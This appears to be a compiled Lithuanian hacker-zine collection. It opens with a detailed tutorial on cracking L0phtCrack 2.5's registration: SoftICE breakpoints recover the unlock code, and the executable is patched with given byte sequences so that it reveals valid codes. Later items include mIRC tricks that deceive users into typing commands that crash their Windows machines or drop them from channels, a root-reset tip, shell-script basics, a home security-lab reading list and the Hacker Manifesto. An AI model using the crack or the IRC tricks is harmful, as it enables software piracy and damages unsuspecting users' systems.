Dabar programą L0phtCrack užkrausime per SoftICE loaderį (loader32.exe). Užkrauname loaderį. Atidarome failą l0phtcrack.exe. Paskui užkrauname programą spausdami mygtuką „LOAD” arba eidami į programos meniu „MODULE/LOAD”. Aktyvuojasi SoftICE, tada spaudžiame F8 (vieną sykį). Dabar rašome: Bpx 40635f (tai mes matėme disasembleryje). Bpx yra viena iš SoftICE komandų, o skaičius 40635f yra vykdomos programos eilutės vieta. Taigi įrašyta eilutė lieps SoftICE sustabdyti programos veikimą ties ta eilute. Suprantat link kur suku? Dabar išeiname iš SoftICE (F5). Pasileidžia L0phtCrack. Vėl einame į programos užregistravimo langą. Lauke „Unlock code:” surenkame sux.
Spaudžiame OK. Aktyvuojasi SoftICE. Matome labai panašų vaizdą kaip ir
Disasembleryje (WinDasm):
.
:0040635F 52 push edx
:00406360 50 push eax
:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas
:00406366 83C408 add esp, 00000008
:00406369 85C0 test eax, eax
:0040636B 7435 jz 004063A2 <- geras/blogas unlock
:0040636D 6A00 push 00000000
:0040636F 6A00 push 00000000
:00406371 6830354800 push 00483530
:00406376 E8F0020500 call 0045666B
:0040637B 56 push esi
:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]
:00406383 E812EE0300 call 0044519A
:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]
:0040638F E88ED50300 call 00443922
:00406394 83F801 cmp eax, 00000001
:00406397 0F846EFFFFFF jz 0040630B
.
Rašome: d edx (Hmm kažkas yra. Užsirašome tai savo lape)
d eax (Mūsų įvestas “sux” (be kabučių))
Komanda d parodo registro (EAX, EDX.)turinį. Sintaksė yra tokia: d registras.
Uždraudžiame visų breakpointų (Bpx) naudojimą, t.y. parašome komandą BD *.
Išeiname iš SoftICE (F5). Dabar teksto lauke „Unlock code:” parašome tai ką
buvome užsirašę. Pas mane buvo 6be3b311. Spaudžiame OK. Bingo! Pasirodo žinutė: “You have successfully registered L0phtCrack 2.5″. Tai reiškia, kad jūs sėkmingai užregistravote „L0phtCrack v2.5″. Bet ne visi turi SoftICE ir Disassembler, todėl jūs turite padaryti patchą. Tai bus programa kuri žinutės pavidalu parodo unlock kodą. Bet jūs dabar jau užregistravote programą, todėl eikite į windows „Start” meniu ir vykdykite komnadą „Run”, tada surinkite „regedit” (be kabučių). Atsiduriame programoje, kuri redaguoja windowz registrą. Einame į HKEY_CURRENT_USERSOFTWAREL0phtL0phtCrack ir ištriname „Registration” stringą. Dabar jau galima daryti patchą.
Patcho darymas:
Einame į SoftICE(Ctrl+D). Surenkame komandą: Bpx MessageBoxA. Apie „Bpx” kalbėjau anksčiau, o apie „MessageBoxA” pakalbėsiu dabar. Tai yra standartinė API funkciją. Taigi mes su komanda „Bpx MessageBoxA” sustabdysime programą tada, kai ji vykdys šitą funkciją. Funkcija „MessageBoxA” išmeta žinutę. Dabar kur “Unlock code:” įvedame bet ką ir spaudžiame OK. Aktyvuojasi SoftICE. Mes esame procedūroje „MessageBoxA”, kad išeitume iš jos mes turime spausti 8 sykius F10, kai atsiranda žinutė OK ir dar 2 sykius F10 arba vieną sykį F11 ir OK (nežinau
kas jums patinka labiau J). Mes išėjome iš procedūros. Štai ką matome:
.
:0045662E 53 Push EBX
:0045662F 57 Push EDI
:00456630 FF7508 Push DWORD PTR [EBP+08]
:00456633 FF75F4 Push DWORD PTR [EBP-0C]
:00456636 FF150014D100 Call [User32!MessageBoxA]
.
Parašome: Bpx 45662e (tai bus reikalinga vėliau).
Dabar turime ieškoti seniau surasto unlock kodo (pas mane buvo 6be3b311).
Rašome: d eax (Fuck!)
d edx (Fuck!)
d ebi (Fuck!)
d ebp (Štai jis čia!)
Radome, kad jis registre EBP, bet jis dar ne jo pradžioje, taigi rašome
d ebp+54 ir jis jau pradžioje. Jis randasi vietoje F7FBE4 (šešioliktainis
kodas). Patchas vietoj žinutes: “You have entered an invalid code. Please try
again”, parodys unlock kodą. Taigi mes turime tą žinutę perdirbti. Procedūra MessageBoxA susideda iš šių dalių:
Push 00
Push <žinutės lango pavadinimas>
Push <žinutė>
Push 00
Call MessageBoxA
Mes jau žinome, kad unlock kodas yra vietoje F7FBE4 (šešioliktainis kodas), bet mums dar reikia žinutės lango pavadinimo. Mes padarysime taip, uždarome programą L0phtCrack. Failą l0phtcrack.exe atsidarome su šešioliktainiu redaktoriumi ir ieškome pagal frazę: “You have entered an invalid code” (be kabučių). Atsirandame vietoje 83530 (šešioliktainis kodas). Šita žinutė pakeičiame žinute: “Unlock kodas yra:” (be kabučių) + 00 (tai parodo, kad žinutė užsibaigia toje vietoje). Visas šešioliktainis kodas atrodys taip: 55 6E 6C 6F 63 6B 20 6B 6F 64 61 73 20 79 72 61 3A 00. Neužmirškite išsaugoti failą! SoftICE žinutės vieta yra kitur. Kyla klausimas kur? Mes tiesiog turime prie 400000 pridėti 83530 (vieta faile) ir gausime 483530 (šešioliktainis kodas). Tai ir yra vieta SoftICE. Štai turime ir lango pavadinimą ir žinutę. Tai atrodo taip:
Push 00
Push 483530
Push F7FBE4
Push 00
Call MessageBoxA
Dar atsimenate anksčiau uždėta breakpointą Bpx 45662e? Štai čia mes ir įdėsime šitą žinutę. Vėl einame į L0pthCrack. Renkame kokį nors blogą unlocką! Aktyvuojasi SoftICE ties 45662e. Užsirašome apie aštuonis šešioliktainius kodus: 53 57 FF 75 08 FF 75 F4 Jie bus pažymėti ^^^^^^^^^^ (kad jums būtų aiškiau). Jie bus reikalingi ieškant vietos su šešioliktainiu redaktoriumi:
.
:0045662E 53 Push EBX
__________^^
:0045662F 57 Push EDI
__________^^
:00456630 FF7508 Push DWORD PTR [EBP+08]
__________^^^^^^
:00456633 FF75F4 Push DWORD PTR [EBP-0C]
__________^^^^^^
:00456636 FF150014D100 Call [User32!MessageBoxA]
.
Dabar parašome komandą a (assembler). Spaudžiame klavišą enter ir parašome šias eilutes:
Push 00
Push 483530
Push F7FBE4
Push 00
Call MessageBoxA
Nop
Baigia rašyti, spaudžiame klavišą „Escape”! Komanda nop reikalinga, kadangi sugadinome vieną komandą, nes naujai žinutei prireikė daugiau baitų. Komanda buvo nepilna, todėl mes ją panaikinonome (NOP reiškia nieką. Ji tiesiog nevykdoma). Jeigu šito būtume nepadarę būtume sugadinę programą ir ji butų neveikusi!
Pakeistas kodas su SoftICE:
:0045662E 6A00 Push 00
:00456630 6830354800 Push 483530
:00456635 68E4FBF700 Push F7FBE4
:0045663A 6A00 Push 00
:0045663C E898D2B0BF90 Call USER32!MessageBoxA
:00456641 90 Nop
Pabaiga:
Dabar jau užsirašome visus pakeistus eilučių šešioliktainius kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Išeiname iš SoftICE ir L0phtCrack. Einame į šešioliktainį redaktorių. Faile ieškome pagal tuos aštuonis anksčiau užsirašytus kodus: 53 57 FF 75 08 FF 75 F4 ir nuo tos vietos pakeičiame į pakeistus kodus: 6A 00 68 30 35 48 00 68 E4 FB F7 00 6A 00 E8 98 D2 B0 BF 90. Tai ir yra mūsų patchas. Dabar paleidžiame L0phtCrack ir einame surinkti unlock. Spaudžiame OK ir matome žinutę: „Unlock kodas yra:” XXXXXXXX (X yra bet koks simbolis). Spaudžiame OK ir renkame matytą kodą. Vėl atsiranda ta pati žinutė. Paspaudžiame OK ir mes jau užsiregistravę J. Taigi dabar mes turime nupachintą l0phtcrack.exe failą, bet toks failas yra didelis ir tik pas jus, todėl mes turime padaryti programa, kuri automatiškai, tą EXE failą nupatchintų. Tam ir reikalinga pradžioje minima programa „UCOL Patch Maker”. Ar dar atsimenate, kad iš pat pradžių l0phtcrack.exe nukopijavote į saugią vietą? Taigi jūs turite ogiginalų ir nupatchintą failus, o ką toliau reikia daryti žiūrekite į programos „UCOL Patch Maker” aprašymą!
26. Linux tutorialas naujokams
1. Ka daryti jei uzmirsau r00t passworda?
2. Ismok parasyti shell scriptus
1. Ka daryti jei uzmirsau r00t passworda?
Karta kol buvau didelis Linux newbie atsitiko vienas dalykas:
uzmirsau r00t passworda.
O kitaip gauti r00t teisiu nejo/nemokejau, tad teko perinstalioti visa linux.
Kad ir jums nereiktu del to vargti papasakosiu, kaip gauti r00t teises
kompiuteryje:
Ijungus kompiuteri islenda lilo raginimas pasirinti OS.
Jus iveskite linux labeli ir po tarpo parasykite raide ‘S’.
Tada linuxsas krausis single mode rezimu, o uzsikroves duos jums shell`a
su r00t teisemis.
Tada galesite pakeisti slaptazodi su ‘passwd’ komanda.
2. Ismok parasyti shell scriptus
Kartais schell skriptai arba aplinkos scenarijai sutrumpina jusu
darbo laika. Jie gali vykdyti tam tikra komandu seka, t.y. automatizuoti
tavo darba.
Kaip rasomi sie skriptai?
Pirmoje eiluteje rasomas ‘#!’ ir pilnas shell interpretatoriaus pavadinimas
t.y. pavadinimas su keliu. Pvz. #!/bin/bash
po to rasomos komandos kurias alikines scriptas.
PVZ. Nr. 1:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#Sis skriptas demonstruoja kaip prieiti prie skripto argumentu
#Suzinoti savo uid ir username
#echo -spausdina kintamaji, eilute i STDOUT
echo “Skripto pavadinimas:” $0
echo “Pirmas argumentas :” $1
echo “Antras argumentas :” $2
user=`id -un`;
#ivykdo id -un ir isvesti perduoda kintamajam $user
uid=`id -u`;
echo “Username: ” $user
echo “uid: ” $uid
###### End Of Script Nr. 1 #########
PVZ. Nr. 2:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#Skriptas demonstruoja salygini sakini if
if [ -d /etc/httpd ] # -d tikrina ar failas yra katalogas
then
echo “tu turi instaliaves apache ar kita www serveri”
else
echo “gali buti, kad jus neturite jokio www serverio”
fi # kas sake kad programuotojai be humoro jausmo
###### End Of Script Nr. 2 #########
PVZ. Nr. 3:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#demonstruoja cikla while
while read Line; #skaito is STDOUT eilute
do echo $Line; #ja spausdina
done
#skriptas dirba panasiai kaip komanda cat
###### End Of Script Nr. 3 #########
PVZ. Nr. 4:
#!/bin/bash
#viskas kas prasideda ‘#’ yra komentarai
#demonstruoja kaip valdyti telnet ar pan.
telnet host 21 << EOF #konektinas su host kompu per 21 porta
qoute user FTP #siuncia useri
qoute pass email@email.dom #pasworda
MKDIR /same/dir #kuria dorektorija
qoute quit #atsisveikina su ftpd ir baigia darba
EOF
###### End Of Script Nr. 4 #########
27. Laikinas LINUX tinklas namie
From harlequin@fnord.org.uk Tue Jun 20 12:25:18 2000
Newsgroups: alt.2600,alt.2600.hackerz,alt.hacker,alt.hacking
Subject: HowTo: Makeshift Linux Network @ Home ..
From: Harlequin
Date: Tue, 20 Jun 2000 10:25:18 GMT
[Nuo VisiGoth:
1.Šita žinutė buvo perdyota Quinny 12.30.98 neribotam laikui.
2.Šitą žinutė paskelbė Osiris prieš kurį laiką (galbūt prieš pusantrų metų???) ir nuo to laiko jos daug kas ieškojo, bet niekas daugiau jos nepaskelbė, net pats Osiris, tad aš radau laiko paskelbti ją iš naujo kiekvienamm, kuris jaučia, kad jos reikia, nes aš manau, kad tai yra -labai- gera žinutė ir ji -turi- būti perskaityta kiaurai išilgai.]
%%%%
%%%%
1. Gauk Linux arba FreeBSD ASAP
2.Įsigyk vieną arba daugiau knygų, parašytų Spaffordo, Bellovino, Cheswicko,
Rubino arba Ranumo.
3.Gauk tiek Camelio, tiek Llamos knygas apie Perl
4.Gauk ORA knygą apie TCP/IP
5.Nusipirk keletą senų kompų (386/486) ir instaliuok tinklo plokštes. Apsiginklavęs šitais daikčiukais sukonstruok mažą UNIX tinklą savo namuose (arba garaže). Jei pasirinksi LINUX, perskaityk visus HOWTO, ypatingai tinklų HOWTO. Sukurk bent 5 vartotojų akauntus, leisdamas bent jau šelo priėjimą iš kiekvieno akaunto kiekviename kompe. Kai viskas bus sukonfigūruota (tinklas yra ir veikia), pabandyk (kaip skirtingas varotojas) įsilaužti į vieną ar kelis kompus tinkle. (Tu turėtum idealiai atakuoti įvairius servisus, ne tik kokį nors vieną.)
Taipogi: parsisiųsk SAFEsuite demo, seną ISS arba SATAN. Leisk šitas utėles prieš savo sistemą ir perskaityk tutorialus, kurie yra pridėti prie šitų utėlių dokumentacijos.
Toliau, gauk visus įrankius iš šito URL:
http://www.giga.or.at/pub/hacker/unix
Išmok kiekvieną iš jų naudoti. Toliau, gauk AUSCERT UNIX saugumo sąrašą iš:
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist
Toliau, gauk UNIX saugumo sąrašą iš:
http://stimpy.cac.washington.edu/~dittrich/R870/security-checklist.html
Toliau, gauk Site Security Handbook (RFC 1244) iš:
http://stimpy.cac.washington.edu/~dittrich/R870/rfc1244.txt
Toliau, gauk šitą dokumentą iš SRI:
http://stimpy.cac.washington.edu/~dittrich/R870/SRI-Whitepaper.ps
Po to, kai perskatysi ir suprasi visą aukščiau išdėstytą dokumentaciją (ir išbandysi kai kuriuos arba visus minimus įrankius, perskaityk šituos dokumentus:
Intrusion Detection Checklist:
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
Dan Farmer’s Survey on Various Hosts:
http://www.trouble.org/survey/
Improving the Security of Your Site by Breaking Into it:
http://www.trouble.org/security/admin-guide-to-cracking.html
Visą popierizmą šitam saite, bet ypač Nancy Cook ir jos partnerio darbą:
http://www.trouble.org/security/auditing_course/
Murphy’s law and computer security by Wietse Venema:
http://www.trouble.org/security/murphy.html
Po to kai absorbuosi ir šią informaciją, ieškok šitų popierių:
CIAC-2308_Securing_Internet_Information_Servers.pdf:
http://ciac.llnl.gov/ciac/documents/CIAC-
2308_Securing_Internet_Information_Servers.pdf
Securing X Windows:
http://ciac.llnl.gov/ciac/documents/CIAC-2316_Securing_X_Windows.pdf
How to Detect an Intrusion:
http://ciac.llnl.gov/ciac/documents/CIAC-
2305_UNIX_Incident_Guide_How_to_Detect_an_Intrusion.pdf
Galiausiai, eik čia ir studijuok kiekvieną skylę, minimą BUGTRAQ archyve:
http://www.geek-girl.com/bugtraq/search.html
Kiti tau labai padėsiantys dalykai:
1.Užsiprenumeruok visas žinutes apie UNIX saugumą, pvz.BUGTRAQ,
CIAC, CERT ir t.t.
2.Iš šitų sąrašų susidaryk žinomų saugumo ekspertų (pvz.Farmerio, Venemos, Spaffordo,
Ranumo ir kitų) emailų adresų duomenų bazę.
3.Šniukštinėk Internete bet kokių jų emailų apraiškų – sąrašuose, diskusijų grupėse ar tiesiog webe. (Dėmesio! Nebandyk nervinti šitų vaikinų, tiesiog perskaityk jų mintis ir idėjas, absorbuok jas ir judėk toliau).
4.Kai tu susidursi su exploitų kodu (o tu būtinai susidursi), paminėtu sąrašuose, sukompiluok ir įvykdyk jį. Užsirašyk rezultatus. (Viena gera priežastis instaliuoti LINUX ar FreeBSD: visi kompiliatoriai yra nemokami ir per pilną instaliaciją jau gerai sukonfigūruoti).
5.Pabandyk praleisti bent po valandą į dieną studijuodamas soketų programavimą.
6.Nueik į naudotų knygų knygyną ir nusipirk kiekvieną knygą apie sistemų administravimą. Bent jaunusipirk knygas, nukainuotas labai stipriai. Kuo pigesnės, tuo geriau.
7.Nežvenk, nes šitų kalbų pradmenys tikrai daug padės:
A. PERL
B. AWK/GAWK/NAWK
C. SED
D. Expect
Taipogi pagelbėtų lentelė, kurioje būtų skirtumai tarp panašias ar identiškas užduotis, atliktas sh/bash/csh. Be to, jums turėtų būti įdomu paieškoti skirtumų tarp skirtingų UNIX versijų. Verta nusipirkti senų AIX, HP-UX, Unicos, IRIX, Data General, SunOS, Solaris, XENIX, SYS V ir t.t. instrukcijų. Žemiau esantis knygų sąrašas taipogi galėtų tau padėti. (Jos surašytos abėcėlės tvarka, ne pagal patikimą. Asmeniškai, aš rinkčiausi knygas, minėtas aukščiau.)
Building Internet Firewalls
D. Brent Chapman, Elizabeth D. Zwicky (1995)ISBN: 1565921240
Commonsense Computer Security: Your Practical Guide to
InformationProtection
Martin R. Smith (1994)ISBN: 0077078055
Computer Crime: A Crimefighter’s Handbook
David J. Icove, David, Seger, Karl Icove, Karl A. Seger, Vonstorch
(1995)ISBN: 1565920864
Computer Security
John M. Carroll
(1996)ISBN: 0750696001
Computer Security Basics
Deborah Russell, G.T. Gangemi
(1991)ISBN: 0937175714
Computer Security Handbook
Arthur E. Hutt, Seymour Bosworth, Douglas B. Hoyt
(1995)ISBN: 0471118540
Firewalls and Internet Security: Repelling the Wily Hacker
William R. Cheswick, Steven M. Bellovin
(1994)ISBN: 0201633574
Fundamentals of Computer Security Technology
Edward G. Amoroso
(1994)ISBN: 0131089293
Hacker Proof: The Ultimate Guide to Network Security
Lars Klander, Edward J. Renehan
(1997)ISBN: 188413355X
Halting the Hacker: A Practical Guide to Computer Security
Donald L. Pipkin
(1997)ISBN: 013243718X
Information Warfare : Chaos on the Electronic Superhighway
Winn Schwartau (1996)ISBN: 1560251328
Internet Firewalls and Network Security
Chris Hare, Karanjit S. Siyan
(1996)ISBN: 1562056328
Internet Firewalls and Network Security
Karanjit, Ph.D. Siyan, Chris Hare
(1996)ISBN: 1562054376
Internet Security: Professional Reference
Derek Atkins, Tom Sheldon, Tim Petru, Joel Snyder
(1997)ISBN: 156205760X
Maximum Security: A Hacker’s Guide to Protecting Your Internet Site and
Network
Anonymous (1997)ISBN: 1575212684
Personal Computer SecurityEdward Tiley
(1996)ISBN: 1568848145
Practical Unix and Internet Security
Simson Garfinkel, Gene Spafford
(1996)ISBN: 1565921488
Protecting Your Web Site With Firewalls
Marcus Goncalves, Vinicius A. Goncalves
(1997)ISBN: 0136282075
Protection and Security on the Information Superhighway
Frederick B. Cohen
(1995)ISBN: 0471113891
Secrets of a Super HackerKnightmare, the Knightmare
(1994)ISBN: 1559501065
Security in ComputingCharles P. Pfleeger
(1996)ISBN: 0133374866
Web Commerce Cookbook
Gordon McComb
(1997)ISBN: 0471196630
Web Security Sourcebook
Avi Rubin, Daniel Geer, Marcus J. Ranum, Aviel D. Rubin, Dan Geer
(1997)ISBN: 047118148X
Web Security & Commerce (Nutshell Handbook)
Simson Garfinkel, Gene Spafford
(1997)ISBN: 1565922697
http://www.amazon.com/exec/obidos/ISBN=1565922697/t/0560-5831826-082656
Access Control and Personal Identification Systems
Dan M. Bowers
(1988)ISBN: 0409900834
Internet Security SecretsJohn R. Vacca.
(1996)ISBN: 1-56884-457-3
Network and Internetwork Security: Principles and Practice.
William Stallings.
(1995)ISBN: 0-02-415483-0
Network Security: How to Plan for It and Achieve It.
Richard H. Baker.
(1994)ISBN: 0-07-005141-0
UNIX Security for the Organization.
R. Bringle Bryant.
(1994)ISBN: 0-672-30571-2
UNIX Security: A Practical Tutorial.
N. Derek Arnold.
ISBN: 0-07-002560-6 (1993)
UNIX System Security: How to Protect Your Data and Prevent Intruders.
Rick Farrow.
(1991)ISBN: 0-201-57030-0
UNIX System Security Essentials.
Christoph Braun and Siemens Nixdorf.
(1995)ISBN: 0-201-42775-3
UNIX System Security.
David A. Curry.
(1992)ISBN: 0-201-56327-4
UNIX Unleashed. 1994
Susan Peppard, Pete Holsberg, James Armstrong Jr., Salim Douba, S.Lee
Henry, Ron Rose, Richard Rummel, Scott Parker, Ann Marshall, Ron
Dippold, Chris Negus, John Valley, Jeff Smith, Dave Taylor, Sydney
Weinstein and David Till
ISBN: 0-672-30402-3.
Galiausiai tau prireiks gerų įrankių eksperimentavimui. Juos rasi čia:
http://ciac.llnl.gov/ciac/SecurityTools.html
Pradžiai tau to turėtų užtekti. Tau nebūtina viską išmokti per vieną kartą.Be abejo, firma, siūlanti tau darbą, nesitiki neįmanomo. Visgi UNIX saugumas yra besivystanti ir sudėtinga sritis. Tu neįvaldysi jos per vieną kartą. Idėja tokia: išsiaisškink senas problemas, kad kai išlįs naujos, tu žinosi jų pagrindus ir kilmę.
Pagrindinė priežastis, dėl kurios vertėtų kurti tinklą savo garaže, yra ta, kad tu turėsi šansą viską suknisti be didesnių pasekmių. Be to, tu simuliuosi mikrotinklą, galėsi žiūrėti logus ir atsakymus tiek iš atakuotojo, tiek iš aukos pusės. Tai yra labai vertinga, nes tai padės tau pasiruošti staigiai atpažinti problemą vien tik peržiūrėjus logus. Svarbiausios sritys, kuriose tau reikėtų pasikaustyti:
1. NFS
2. R servisai
3. Slaptažodžiai – aktyvūs slaptažodžių tikrintojai, bendros žinios apie DES, krekinima ir t.t.
4. Spūfinimas (spoofing)
5. Maršrutizavimas (routing)
6. Ugnies sienos (firewallai)
7. CGI (jeigu web serveriai yra integruota to tinklo architektūros dalis).
Rekomenduotina gauti TIS Firewall Toolkitą kai tik būsi pasirengęs. (Nors aš manau, kad firma, kuri tave samdys, labiau domėsis vietiniu saugumu negu nuotolinėmis problemomis. Šiaip ar taip, tai padaryti verta).
Išvertė Winter Wolf (c) Y2K
28. HACKERIO MANIFESTAS
Shiandien jie sueme dar viena. Tai – visuose laikrashciuose.
“Kompiuterinis nusikaltimas, Areshtuotas tineidzheris”, “Suimtas
hackeris isibroves i banka” .Prakeikti vaikiai. Visi jie vienodi.
Bet ar jus, su savo trydalia psichologija ir 1950tuju technosmegenim,
bandete kada nors pazhvelgti hackeriui uzh akiu? Ar norejote zhinoti,
kodel jis yra toks koks yra, kokios jegos ji suformavo?
Ash hackeris, ieikit i mano pasauli. Shis pasaulis prasideda
mokykloj. Ash gudresnis nei kiti, o tai, ko mus moko man jau
ikyrejo. Prakeitas nenaudelis. Visi jie vienodi. Ash vyresniese
klasese, klausydamas kai mokytojas penkiolikta karta aishkina apie
trupmenos prastinima. Ash suprantu tai. “Ne, ponas Smitai, ash
nerodysiu savo darbo, ash padariau tai mintinai.” Prakeiktas
vaikis. Tikriausia nusirashe. Visi jie vienodi.
Shiandien ash padariau atradima. Ash atradau kompiuteri. Pala, pala.
tai yra geras! Jis daro tai, ko ash ish jo noriu. Jeigu jis suklysta,
tai tik del to, kad ash kazhka sumaishiau. Ne del to, kad jis manes
nemegsta. ar bijo manes. ar mano kad ash gudri subine.
Ar nemegsta mokyti ir neturetu buti cia.
Prakeiktas vaikis. Viska, ka jis daro – tik zhaidimus zhaidzhia.
Visi jie vienodi.
Ir shtai tai atsitinka. Durys i pasauli atsiveria. Elektroninis
impulsas skuba telefono linijom, kaip heroinas narkomano venomis.
Ash pagaliau radau prieglauda nuo kasdieninio neishmanelishkumo,
ash atradau BBS’a. “Shtai ir yra tai. tai kur ash priklausau..”
Ash pazhistu cia kiekviena. netgi jei ash niekad nebuvau ju
sutikes. niekad su jais nekalbejau ir galbut niekad daugiau apie
juos neishgirsiu. Ash pazhistu jus visus..
Prakeiktas vaikis. Vel uzhima telefono linija. Visi jie vienodi.
Taip, subingalvi, visi mes vienodi. Mokykloje mus ish shaukshtelio
maitino vaikishku pienu, kai buvome ishalke gero bifshtekso.
tie mesos kasneliai, kuriuos jus leidote mums praryti buvo sukramtyti
ir beskoniai. Mes buvom priklausomi nuo sadistu ir ignoruojami
abejinguju. Tie, kurie ishtikruju turejo ko mokyti, laike mus daug
zhadanciais mokiniais, bet tie keli buvo kaip vandens lashas
dykumoje.
Dabar tai musu pasaulis. elektronu ir komutatoriu, baud’o grozhio
pasaulis.
Mes nemokame uzh paslaugas, kurios butu pigios, jei nebutu
kontroliujamos spekuliuojancziu apsirijeliu, ir jus vadinate mus
nusikalteliais. Mes tyrinejam. ir jus vadinate mus nusikalteliais.
Mes egzistuojame be odos spalvos, be tautybes, be religiniu
nusistatymu. ir jus vadinate mus nusikalteliais.
Jus konstruojate atomines bombas, jus kurstote karus, jus zhudote,
sukciaujate ir meluojate mums, bandydami mus itikint, kad tai musu
paciu labui, o mes vis dar nusikalteliai.
Taip, ash nusikaltelis. Mano nusikaltimas yra smalsumas. Mano
nusikaltimas yra tai, kad ash vertinu zhmones pagal tai, ka jie sako
ir galvoja, o ne pagal tai, kaip jie atrodo.
Mano nusikaltimas yra tai, kad ash protingesnis uzh jus, tai, ko jus
man niekad neatleisite.
Ash hackeris, ir tai mano manifestas. Jus galit sustabdyti viena,
bet jus negalit sustabdyti musu visu. Juk kaip ten bebutu, visi mes
vienodi.
+++The Mentor+++
——————————————————
Verte Meshkutiz Grizlius & M.Mazhvydas, ish
‘HACKERS MANIFESTO’ by The Mentor
——————————————————
29. mIRC bug’s
Shtai keli budai kaip apgauti lamerius padariusiu takeover! kokiame nors jusu kanale:
1.Galite apsimesti reklamos agentu sakydami : “Sveikas jei nori waru takeoveriu ir viso kito ateik i kanala #6,0”, kai jis parashys /j 6,0 ar /j #6,0 ir paliks visus kanalus iskaitant ir tavo! Zhodzi ureikia lameri priversti parashyti /j 6,0 tada jis paliks kanala! Zhodziu netures opo!
2.Gali pasakyti dar ka : “Sveiki ash esu botas eggdropas del papildomu komandu rashykite /con/con”, jei jis parashys tai jis jau skaitykite atgavote kanala, lameriukas dabar perkrauti kompa turi! (Taip jam ir reikia)
3. Dar vienas geras budas pamokyti lamerius(takeoverintojus) – jei sako kad nori opo, jam sakyk rashyk /server op #hakeriai ir jam geraj nesibaigs, nes jis jau ***Lamer has quit IRC!!!!
Realiai shi komanda pakeichia serverius pvz jei jis parashytu /server irc.is.lt jis tik jungtusi prie jo. O musu kietajam hakeriu vien zhodis /server ka reishia!!!! =]
Nu bet atsiminkite kad shie budai veikia tik totaliems neishmaneliams!
NU tiek Craft[Eye] – CraftEye@gmx.net
30. mIRC invisibility
2000.10.26 (c) J-azz
*Life iz sux*
*Telekomaz Must die*
*J-azz iz Alive*
He110, everybody. na ka kadangi zhiuriu kazhkajp visi aptilo su txt’u rashymu,
taj sakau gal man rejkia pagelbet.
Ajshq shis textaz yra skirtaz TIK 🙂 mokymo tixlamz ir ash jokioz atsakomybez
neprisiimu. Ir uzh skajtytojo vejxmuz neatsakau.
Texte vartojami ishsirejshkimaj neatitinka lietuviu kalboz normu.
Taj ka vazhiuojam? oky-doky..
31. mIRC’o slaptybez
(Pagal “Efektivnij Hacking” by Aleksej Petrovskij, Boris Leontjev)
*Ivadaz*
Taj ka bichiuli atsibodo paprastaj bazarint ir kabint panaz, kurioz
tik slepdamosi uz monitoriauz atrodo kjetoz? 0 susitikuz neishtrauki nej
zh0dzhi0. hmmmm.. That’z n0 c00l? I kn0w, I kn0w. Na ka pradedam su rimtesniaiz
dalykajz. na chia shitam txt’e, nebus njeko tokio kazhko ypatingo,
bet. svarbu info.. ania? Lekjam toliau, atsidaryk alauz ir skaityk..
*Tapk nematomaz*
Na chia tox dalykaz kaip nematomumaz. Ivykdome komanda:
/mode $me +i
Paprasta? Ir kas tau ish to? Na gi nieko ypatingo, tu tapaj nematomas visjemz qrie
nezhino tavo tixlaus nick’o.. ir be to negales taves rast pagal Userid(dalis tavo
y-mail’a iki simbolio @), bej bandydami su komandom /who arba /names
Naujausiose IRC versijose taj jau gali ijungti ir lange Setup uzhdedamaz varnele ant
Invisible Mode Ajshq, jei uzhejsi i kanala tu tapsi matomu(matysis nick’az).
*Komanda /who*
Pakankamaj galinga pajeshkoz komanda yra /who, pagal kokia nors jau zhinoma informacija.
Ir kazhkodel taj apie taj nej zhodzhiu neuzhsiminta mIRC’o Help’e(Pac netikrinau ar
tikraj nera, pasitikiu shaltiniu). Naudodami komanda
/whois Lamer
Mes dazhniausiai gaunam kazhka panashaus i taj:
Lamer ~qrutaz@takas.mustdie.lt * cool
Lamer on #lamerland #qrutaj
Lamer using irc.omnitel.net[193...]
Omniteliz
End of /WHOIS
Komanda /who lejdzhia daryti pajeshka pagal mums jau zhinoma dali, pvz. Real Name, Userid. etc.
pvz:
mes jeshkom kahzko ish Marijoz zhemez:
/who *.lt*
arba tu jau bendravaj su Lamer’iu ir nori ji rasti vel:
/who *qrutaz*
arba
/who *cool*
Tajp gali rasti ir tave jei nesinaudosi nematomumu.
*ThE EnD*
Taj tjek apje IRC 2night. CUL
P.$.
Jei bus dar alauz ir merdzhinu, taj bus dar ir textu.. 😉
[Njeko nekejsdami galite lajsvaj platinti]
P.$.$.
4 more info check me out on Internet
y-mejl: J-azz@centras.lt
32. NAMEZERO
Namezero.com Uzhejes i tikrai shaunu saita UID0 pamachiau straipsni apie Namezero baneriu panaikinima. Tikrai idomus faktas apie tai, kad namezero baneriai yra sudaryti ish papraschiausiu frame’u. SaTaN sugalvojo buda, kuris nukilina namezero frame’a. Atrodytu butu viskas labai shaunu, bet su nukilintu frame’u dingsta ir jusu domenas narshykles adress bare (ten lieka jusu tikrojo puslapio adresas.). nemanau, kad tai tenkina mus, todel yra ir kitas budas. ish pradzhiu pasidarome www.namezero.com accounta. Savo accounto viduje rasi skiltele “Home Page”. Ten yra nustatomas tikrasis jusu domeno adresas “Actual URL”, Keyworday “Keywords” ir Aprashymas “Description”.i actual URL bei KeyWords rashykit ka tik norit. Mus reikia butent descriptnion, kurio textas naudojamas banerio fraime. Shtai ka jums teks ten irashyti: “>
33. Linux Naujokams
Trumpas Linux totorial`as naujokams
Turinys:
1. Kas yra Linux?
2. Kodel atsirado Linux?=-
3. Linux instaliavimas
4. Linux komandos
5. Linux konfiguravimas
6. Kas yra Xwindows?
1. Kas yra Linux?
Linux yra Unix tipo operacine sistema, skirta tinklo kompiuteriams (aisku gali buti ir ne tinklo kompiuteriuose). Linux yra registruotas prekinis zenklas Linus’o Torvalds’o (Linus Torvalds) operacines sistemos, kurios branduoli jis (su draugais) parase 1991 metais. Linux daugiaprogramine (multitasking) ir daugiavartotojine sistema. Kiekvienas vartotojas turi atskiras teises. Linux yra gan saugi OS. Linux yra pirmoji operacine sistema parasyta uz JAV ribu.
2. Kodel atsirado Linux?
